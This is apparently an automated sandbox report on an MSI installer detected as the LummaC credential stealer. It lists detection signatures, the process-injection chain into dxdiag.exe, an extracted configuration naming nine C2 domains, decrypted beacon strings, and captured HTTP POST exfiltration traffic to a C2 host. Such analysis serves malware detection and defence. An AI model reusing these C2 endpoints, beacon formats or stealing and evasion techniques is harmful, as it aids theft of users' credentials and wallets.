Edit tour

Windows Analysis Report
msit.msi

Overview

General Information

Sample name:	msit.msi
Analysis ID:	1589838
MD5:	18577f68754f3e2703cdca2df9ba65ff
SHA1:	8d8846470510b1b6f81c0725975c7c3589568bb3
SHA256:	413c17f73a0831d6ae209e491856a66e07e8c0af70e7e06f68a7b7570ccb3a95
Tags:	ghd78sgithubmsiuser-JAMESWT_MHT
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Drops executables to the windows directory (C:\Windows) and starts them

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 992 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\msit.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 416 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 6036 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 031803DE2C6D91C23BF4AB9F8F38A8DE MD5: 9D09DC1EDA745A5F87553048E57620CF)

MSIAEB.tmp (PID: 2248 cmdline: "C:\Windows\Installer\MSIAEB.tmp" MD5: 4D82074854750FDBA89D76624CC1E6F6)

dxdiag.exe (PID: 4828 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

dxdiag.exe (PID: 1708 cmdline: "C:\Windows\SysWOW64\dxdiag.exe" MD5: 24D3F0DB6CCF0C341EA4F6B206DF2EDF)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["fixxyplanterv.click", "print-vexer.biz", "se-blurry.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "impend-differ.biz", "dare-curbys.biz", "covery-mover.biz", "formy-spill.biz"], "Build id": "ZqchOa--new"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: dxdiag.exe PID: 1708	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 1708	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dxdiag.exe PID: 1708	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:29:11.533777+0100	2028371	3	Unknown Traffic	192.168.2.6	49711	172.67.134.197	443	TCP
2025-01-13T08:29:12.760819+0100	2028371	3	Unknown Traffic	192.168.2.6	49717	172.67.134.197	443	TCP
2025-01-13T08:29:13.982385+0100	2028371	3	Unknown Traffic	192.168.2.6	49728	172.67.134.197	443	TCP
2025-01-13T08:29:15.144517+0100	2028371	3	Unknown Traffic	192.168.2.6	49734	172.67.134.197	443	TCP
2025-01-13T08:29:16.338516+0100	2028371	3	Unknown Traffic	192.168.2.6	49741	172.67.134.197	443	TCP
2025-01-13T08:29:18.004044+0100	2028371	3	Unknown Traffic	192.168.2.6	49753	172.67.134.197	443	TCP
2025-01-13T08:29:19.579194+0100	2028371	3	Unknown Traffic	192.168.2.6	49765	172.67.134.197	443	TCP
2025-01-13T08:29:21.624274+0100	2028371	3	Unknown Traffic	192.168.2.6	49781	172.67.134.197	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:29:12.199354+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49711	172.67.134.197	443	TCP
2025-01-13T08:29:13.263540+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49717	172.67.134.197	443	TCP
2025-01-13T08:29:21.949582+0100	2054653	1	A Network Trojan was detected	192.168.2.6	49781	172.67.134.197	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:29:12.199354+0100	2049836	1	A Network Trojan was detected	192.168.2.6	49711	172.67.134.197	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:29:13.263540+0100	2049812	1	A Network Trojan was detected	192.168.2.6	49717	172.67.134.197	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T08:29:16.950627+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.6	49741	172.67.134.197	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.2193785940.000001DCF5E51000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["fixxyplanterv.click", "print-vexer.biz", "se-blurry.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "impend-differ.biz", "dare-curbys.biz", "covery-mover.biz", "formy-spill.biz"], "Build id": "ZqchOa--new"}

Multi AV Scanner detection for dropped file

Source: C:\Windows\Installer\MSIAEB.tmp

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: msit.msi	Virustotal: Detection: 57%			Perma Link
Source: msit.msi	ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.5% probability

Machine Learning detection for dropped file

Source: C:\Windows\Installer\MSIAEB.tmp

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fixxyplanterv.click
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000006.00000002.2305559234.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ZqchOa--new

Source: C:\Windows\SysWOW64\dxdiag.exe

Code function: 6_2_00415971 CryptUnprotectData,

6_2_00415971

Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.134.197:443 -> 192.168.2.6:49781 version: TLS 1.2

Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: msit.msi, 5403ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: msit.msi, MSI670.tmp.2.dr, 5403ef.msi.2.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 152A0A64h	6_2_0040D866
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	6_2_0043C8F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, ebx	6_2_00415971
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	6_2_0043CA10
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [eax], dl	6_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edi, dword ptr [esi+10h]	6_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [eax], dl	6_2_0040E458
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	6_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-5Ch]	6_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+eax*8], 299A4ECDh	6_2_0043D400
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+04h]	6_2_0040CDD7
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	6_2_00438640
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+edi-14B5D619h]	6_2_004227B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], B12AB835h	6_2_0041805C
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [edi], bl	6_2_00409070
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	6_2_00425800
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [ecx], dx	6_2_0041C802
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [esi], cl	6_2_00425820
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 71D94D17h	6_2_004180EC
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+76h]	6_2_004238F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 403020B8h	6_2_0040D136
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	6_2_004029C0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+eax*8], 9CAC4597h	6_2_0040D9D6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	6_2_0042A9D5
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+ebx*8], 85917B02h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, ecx	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], 4D507EB0h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 7FC6CA61h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [esi], al	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	6_2_004181E9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [esi], cx	6_2_004231F6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx esi, word ptr [eax]	6_2_004231F6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	6_2_0041A9B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [edx], bp	6_2_0041CA48
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp ecx	6_2_0043BA70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov esi, edx	6_2_0043BA70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	6_2_0042AAC6
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	6_2_0042AAD7
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then lea edx, dword ptr [edx+edx*4]	6_2_004082F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	6_2_004362F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 67F3D776h	6_2_004362F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]	6_2_00426282
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	6_2_0041DA80
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, dword ptr [esi+28h]	6_2_0042AA8A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	6_2_00432AA0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov eax, dword ptr [edi+0Ch]	6_2_004022B0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp eax	6_2_0041BB20
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp word ptr [ebx+esi], 0000h	6_2_0041C330
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+65184CD6h]	6_2_00436BE4
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	6_2_00407450
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	6_2_00407450
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+3A59EDA7h]	6_2_004264F2
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-5Ch]	6_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	6_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, word ptr [eax]	6_2_0043CCF0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp ecx	6_2_0040A4FC
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov byte ptr [edi], al	6_2_00416CBD
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, di	6_2_0042456F
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	6_2_00421D73
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edi, byte ptr [ecx]	6_2_00421D73
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h	6_2_00438D70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A8F779E4h	6_2_00438D70
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 1F1F7B79h	6_2_00417D74
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-00000095h]	6_2_0042A58E
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	6_2_00428DB0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+40h]	6_2_0041AEC5
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov word ptr [ecx], dx	6_2_0040DEE9
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then jmp eax	6_2_0043B6F0
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, edx	6_2_0041676A
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov ecx, eax	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h	6_2_00419710
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-4D5F809Ah]	6_2_0043A71E
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then mov edx, ecx	6_2_00409730
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-35CC155Bh]	6_2_0041AFD8
Source: C:\Windows\SysWOW64\dxdiag.exe	Code function: 4x nop then movzx ecx, di	6_2_0042456F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49717 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49717 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49711 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49781 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49741 -> 172.67.134.197:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: fixxyplanterv.click
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: formy-spill.biz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49765 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49734 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49781 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49753 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 172.67.134.197:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 172.67.134.197:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GCRSQKWBECOUZEBTXP7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12863Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0B0BRVQPHOX7M5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15079Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6KL9F4AUEFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19913Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HC6MUG7SIZ2ZMCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1208Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1T0PER0JZ2WX3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552115Host: fixxyplanterv.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fixxyplanterv.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fixxyplanterv.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click

